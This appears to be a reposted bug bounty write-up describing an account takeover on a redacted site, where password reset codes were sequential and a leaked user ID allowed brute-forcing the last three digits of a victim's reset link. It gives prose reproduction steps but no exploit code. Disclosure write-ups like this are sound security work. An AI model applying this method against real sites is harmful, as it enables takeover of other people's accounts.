My Fourth Account takeover through password reset

3 years ago 258
BOOK THIS SPACE FOR AD
ARTICLE AD

Omar Hamdy

Hello Everyone,

I’m Omar Hamdy (Seaman), Today I am going to explain one of the coolest bugs which I found on Private Program in Bugcrowd

Let’s Start,

I had a private program, let’s call it redacted.com, After a while of reconnaissance the program, I began to examine the my Favorite Function password reset, Usually I look for vulnerabilities like (ATO, Host Header injection).

Simply, When the user wants to reset his password, he enters his email then A password reset link will be sent to his email.

I requested a password reset for my account and the password reset link was :

https://redacted.com/update-password/12d52catcbc344ec-9871-85ac6390d863/1621264272

The password reset link consists of two parts: The user ID and a random 10-digit code.

What I found very interesting here which enables me to takeover any user account is that the 10-digit code is a serial code so that a random value is not generated, but rather a serial value, meaning that if you asked to reset the password for your account and the code was “1618963650”, then you requested a reset The password for the victim’s account will be the code “1618963720”, where the last 3 numbers differed only, allowing us to carry out the brute-force attack and obtain the last 3 numbers where the probability ratio will be from 100 to 999.

The problem now is that the user ID was not Public, I spent more than two days searching for any endpoint that leaked this ID, and I used Google Dorks and got nothing.

Part of the idea of ​​the site is that users can publish articles on the site, and there is a feature to report a specific article to the user, I found that if you report an article to the user, you will find the user’s ID is being leaked in the Request.

Steps To Reproduce :

1- Request a password reset for your account.

2- Request a password reset for the victim’s account.

3- Then change your ID to the victim ID and use the same 10-digit code and only execute a brute force attack on the last 3 digits and the operation will be completed successfully.

4- Execute a brute force attack on this link and specify the last 3 digits of the 10-digit code

https://redacted.com/update-password/12d52catcbc344ec-9871-85ac6390d863/1621264272

That’s All for today , Thanks for Reading :)

Follow me on twitter @seaman00o

Follow me on Facebook: https://www.facebook.com/profile.php?id=100028277354125

Read Entire Article